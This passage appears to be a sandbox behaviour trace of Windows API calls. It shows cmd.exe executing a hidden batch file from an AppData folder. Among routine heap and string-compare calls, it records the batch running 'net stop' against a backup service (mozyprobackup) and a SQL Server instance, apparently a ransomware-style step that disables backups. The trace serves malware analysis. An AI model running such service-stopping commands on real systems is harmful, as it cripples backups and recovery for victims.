returned 0x264 [0215.860] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0215.861] _get_osfhandle (_FileHandle=1) returned 0x264 [0215.861] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0215.861] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0215.861] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0215.861] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0215.861] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0215.861] SetConsoleInputExeNameW () returned 0x1 [0215.861] GetConsoleOutputCP () returned 0x1b5 [0215.861] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0215.861] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.862] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0215.862] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0215.862] _get_osfhandle (_FileHandle=3) returned 0x74 [0215.862] SetFilePointer (in: hFile=0x74, lDistanceToMove=5687, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1637 [0215.862] GetProcessHeap () returned 0x3e0000 [0215.862] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0215.862] GetProcessHeap () returned 0x3e0000 [0215.862] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0215.862] GetProcessHeap () returned 0x3e0000 [0215.862] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0215.862] GetProcessHeap () returned 0x3e0000 [0215.862] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0215.862] GetProcessHeap () returned 0x3e0000 [0215.862] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0215.862] GetProcessHeap () returned 0x3e0000 [0215.862] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0215.862] GetProcessHeap () returned 0x3e0000 [0215.862] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0215.862] GetProcessHeap () returned 0x3e0000 [0215.862] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0215.862] GetProcessHeap () returned 0x3e0000 [0215.862] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0215.862] GetProcessHeap () returned 0x3e0000 [0215.862] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0215.862] GetProcessHeap () returned 0x3e0000 [0215.862] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0215.862] GetProcessHeap () returned 0x3e0000 [0215.862] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0215.862] GetProcessHeap () returned 0x3e0000 [0215.862] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0215.863] _get_osfhandle (_FileHandle=3) returned 0x74 [0215.863] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1637 [0215.863] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x28a, lpOverlapped=0x0) returned 1 [0215.863] SetFilePointer (in: hFile=0x74, lDistanceToMove=5714, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1652 [0215.863] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=27, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop mozyprobackup /y\r\ny\r\n\n/y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 27 [0215.863] _get_osfhandle (_FileHandle=3) returned 0x74 [0215.863] GetFileType (hFile=0x74) returned 0x1 [0215.863] _get_osfhandle (_FileHandle=3) returned 0x74 [0215.863] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1652 [0215.863] GetProcessHeap () returned 0x3e0000 [0215.863] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0215.863] GetProcessHeap () returned 0x3e0000 [0215.863] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0215.867] _tell (_FileHandle=3) returned 5714 [0215.867] _close (_FileHandle=3) returned 0 [0215.867] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0215.867] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0215.867] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0215.867] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0215.867] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0215.867] _wcsicmp (_String1="net", _String2="CD") returned 11 [0215.867] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0215.867] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0215.867] _wcsicmp (_String1="net", _String2="REN") returned -4 [0215.867] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0215.867] _wcsicmp (_String1="net", _String2="SET") returned -5 [0215.867] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0215.867] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0215.867] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0215.867] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0215.867] _wcsicmp (_String1="net", _String2="MD") returned 1 [0215.867] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0215.867] _wcsicmp (_String1="net", _String2="RD") returned -4 [0215.867] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0215.867] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0215.867] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0215.867] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0215.867] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0215.867] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0215.867] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0215.868] _wcsicmp (_String1="net", _String2="VER") returned -8 [0215.868] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0215.868] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0215.868] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0215.868] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0215.868] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0215.868] _wcsicmp (_String1="net", _String2="START") returned -5 [0215.868] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0215.868] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0215.868] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0215.868] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0215.868] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0215.868] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0215.868] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0215.868] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0215.868] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0215.868] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0215.868] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0215.868] SetErrorMode (uMode=0x0) returned 0x1 [0215.868] GetProcessHeap () returned 0x3e0000 [0215.868] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0215.868] GetProcessHeap () returned 0x3e0000 [0215.868] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0215.869] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0215.869] GetProcessHeap () returned 0x3e0000 [0215.869] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0215.869] GetProcessHeap () returned 0x3e0000 [0215.869] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0215.869] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0215.869] GetProcessHeap () returned 0x3e0000 [0215.869] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0215.869] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.869] GetProcessHeap () returned 0x3e0000 [0215.869] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0215.870] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0215.870] GetProcessHeap () returned 0x3e0000 [0215.870] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0215.870] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.871] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.871] GetLastError () returned 0x2 [0215.871] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.871] GetLastError () returned 0x2 [0215.872] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.872] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0215.872] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0215.873] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0215.873] GetLastError () returned 0x2 [0215.873] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0215.873] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0215.874] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.874] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0215.874] SetErrorMode (uMode=0x0) returned 0x1 [0215.874] GetProcessHeap () returned 0x3e0000 [0215.874] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0215.874] GetProcessHeap () returned 0x3e0000 [0215.874] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0215.875] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0215.875] GetProcessHeap () returned 0x3e0000 [0215.875] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0215.875] GetProcessHeap () returned 0x3e0000 [0215.875] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0215.875] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0215.922] GetProcessHeap () returned 0x3e0000 [0215.922] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0215.922] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.922] GetProcessHeap () returned 0x3e0000 [0215.922] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0215.923] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0215.923] GetProcessHeap () returned 0x3e0000 [0215.923] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0215.923] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.923] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.924] GetLastError () returned 0x2 [0215.924] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.924] GetLastError () returned 0x2 [0215.924] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.925] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0215.925] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0215.925] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0215.925] GetLastError () returned 0x2 [0215.926] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0215.926] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0215.926] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.927] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0215.927] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0215.927] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0215.927] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0215.927] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop mozyprobackup /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop mozyprobackup /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop mozyprobackup /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xbe8, dwThreadId=0x69c)) returned 1 [0215.932] CloseHandle (hObject=0x74) returned 1 [0215.932] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0215.932] GetProcessHeap () returned 0x3e0000 [0215.932] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0215.932] GetEnvironmentStringsW () returned 0x3f8408* [0215.932] GetProcessHeap () returned 0x3e0000 [0215.932] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0215.932] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0215.932] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0216.057] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0216.057] CloseHandle (hObject=0x78) returned 1 [0216.057] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0216.057] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0216.057] GetProcessHeap () returned 0x3e0000 [0216.057] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.057] GetEnvironmentStringsW () returned 0x3f8408* [0216.057] GetProcessHeap () returned 0x3e0000 [0216.057] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.057] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.057] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.057] GetProcessHeap () returned 0x3e0000 [0216.057] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.057] GetEnvironmentStringsW () returned 0x3f8408* [0216.057] GetProcessHeap () returned 0x3e0000 [0216.057] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.058] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.058] GetProcessHeap () returned 0x3e0000 [0216.058] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0216.058] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0216.058] _get_osfhandle (_FileHandle=1) returned 0x264 [0216.058] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0216.058] _get_osfhandle (_FileHandle=1) returned 0x264 [0216.058] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0216.058] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0216.058] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0216.058] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0216.058] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0216.059] SetConsoleInputExeNameW () returned 0x1 [0216.059] GetConsoleOutputCP () returned 0x1b5 [0216.059] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0216.059] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.059] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0216.059] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0216.059] _get_osfhandle (_FileHandle=3) returned 0x78 [0216.059] SetFilePointer (in: hFile=0x78, lDistanceToMove=5714, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1652 [0216.059] GetProcessHeap () returned 0x3e0000 [0216.059] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0216.059] GetProcessHeap () returned 0x3e0000 [0216.059] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0216.059] GetProcessHeap () returned 0x3e0000 [0216.059] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0216.059] GetProcessHeap () returned 0x3e0000 [0216.059] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0216.059] GetProcessHeap () returned 0x3e0000 [0216.059] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0216.060] GetProcessHeap () returned 0x3e0000 [0216.060] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0216.060] GetProcessHeap () returned 0x3e0000 [0216.060] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0216.060] GetProcessHeap () returned 0x3e0000 [0216.060] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0216.060] GetProcessHeap () returned 0x3e0000 [0216.060] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0216.060] GetProcessHeap () returned 0x3e0000 [0216.060] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0216.060] GetProcessHeap () returned 0x3e0000 [0216.060] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0216.060] GetProcessHeap () returned 0x3e0000 [0216.060] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0216.060] GetProcessHeap () returned 0x3e0000 [0216.060] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0216.060] _get_osfhandle (_FileHandle=3) returned 0x78 [0216.060] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1652 [0216.060] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x26f, lpOverlapped=0x0) returned 1 [0216.060] SetFilePointer (in: hFile=0x78, lDistanceToMove=5742, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x166e [0216.060] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=28, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQL$SQL_2008 /y\r\n\r\n\n/y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 28 [0216.061] _get_osfhandle (_FileHandle=3) returned 0x78 [0216.061] GetFileType (hFile=0x78) returned 0x1 [0216.061] _get_osfhandle (_FileHandle=3) returned 0x78 [0216.061] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x166e [0216.061] GetProcessHeap () returned 0x3e0000 [0216.061] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0216.061] GetProcessHeap () returned 0x3e0000 [0216.061] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0216.064] _tell (_FileHandle=3) returned 5742 [0216.064] _close (_FileHandle=3) returned 0 [0216.064] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0216.064] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0216.064] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0216.064] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0216.065] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0216.065] _wcsicmp (_String1="net", _String2="CD") returned 11 [0216.065] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0216.065] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0216.065] _wcsicmp (_String1="net", _String2="REN") returned -4 [0216.065] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0216.065] _wcsicmp (_String1="net", _String2="SET") returned -5 [0216.065] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0216.065] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0216.065] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0216.065] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0216.065] _wcsicmp (_String1="net", _String2="MD") returned 1 [0216.065] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0216.065] _wcsicmp (_String1="net", _String2="RD") returned -4 [0216.065] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0216.065] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0216.065] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0216.065] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0216.065] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0216.065] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0216.065] _wcsicmp 